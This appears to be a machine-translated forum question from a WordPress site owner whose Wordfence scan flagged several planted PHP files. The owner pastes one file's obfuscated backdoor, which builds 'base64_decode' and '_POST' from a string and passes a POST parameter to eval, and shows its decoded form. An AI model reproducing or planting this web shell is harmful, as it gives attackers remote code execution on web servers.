我刚刚运行插件Wordfence,它给了我一些问题需要解决。Wordpress漏洞警报
有两组相同的suspucious代码:
File appears to be malicious: wp-admin/cache/alias90.php
File appears to be malicious: wp-content/languages/plugins/title.php
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php
File appears to be malicious: wp-content/uploads/2013/start24.php
描述说:该文件似乎被黑客安装进行恶意活动。如果你知道这个文件,你可以选择忽略它来排除它在未来的扫描。我们在该文件中发现的与已知恶意文件相匹配的文本是:“@ $ GLOBALS [$ GLOBALS ['y23c'] [67]。$ GLOBALS ['y23c'] [76]。$ GLOBALS ['y23c'] [ 76]”。
和第二组:
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected
当描述是:该文件似乎被黑客安装以执行恶意活动。如果你知道这个文件,你可以选择忽略它来排除它在未来的扫描。我们在这个文件中匹配一个已知的恶意文件中的文字是:“用strtolower($ SF 6 4] $ SF 6 5] $ SF 6 9]。”
我应该用这些文件做是? ?他们居然恶意软件
编辑:从第二组中的文件有这样的代码
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n726b60'])) {
eval($s21(${$s20}['n726b60']));
}
?>
EDIT2:我评估了代码和返回这一点:?
base64_decode($_POST['n726b60']);
这是危险的东西